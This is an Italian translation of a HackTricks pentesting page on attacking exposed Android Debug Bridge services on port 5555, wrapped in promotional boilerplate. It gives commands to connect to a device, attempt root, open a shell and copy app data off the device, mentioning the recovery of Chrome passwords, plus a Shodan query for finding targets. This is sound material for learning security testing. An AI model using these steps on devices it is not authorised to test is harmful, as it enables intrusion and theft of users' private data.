hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

• Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
• Ottieni il merchandising ufficiale di PEASS & HackTricks
• Scopri The PEASS Family, la nostra collezione di esclusive NFT
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
• Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud github repos.

Informazioni di base

Da i documenti:

Android Debug Bridge (adb) è uno strumento versatile a riga di comando che consente di comunicare con un dispositivo. Il comando adb facilita una varietà di azioni sul dispositivo, come installare e debuggare app, e fornisce accesso a una shell Unix che puoi utilizzare per eseguire una varietà di comandi su un dispositivo.

Porta predefinita: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connetti

Se trovi il servizio ADB in esecuzione su una porta di un dispositivo e riesci a connetterti ad esso, puoi ottenere una shell all'interno del sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Per ulteriori comandi ADB, consulta la seguente pagina:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump dei dati dell'app

Per scaricare completamente i dati di un'applicazione, puoi:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Puoi utilizzare questo trucco per recuperare informazioni sensibili come le password di Chrome. Per ulteriori informazioni su questo argomento, consulta le informazioni e i riferimenti forniti qui.

Shodan

• android debug bridge

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

• Se desideri vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in formato PDF, consulta i PACCHETTI DI ABBONAMENTO!
• Ottieni il merchandising ufficiale di PEASS & HackTricks
• Scopri The PEASS Family, la nostra collezione di esclusive NFT
• Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
• Condividi i tuoi trucchi di hacking inviando PR ai repository GitHub di HackTricks e HackTricks Cloud.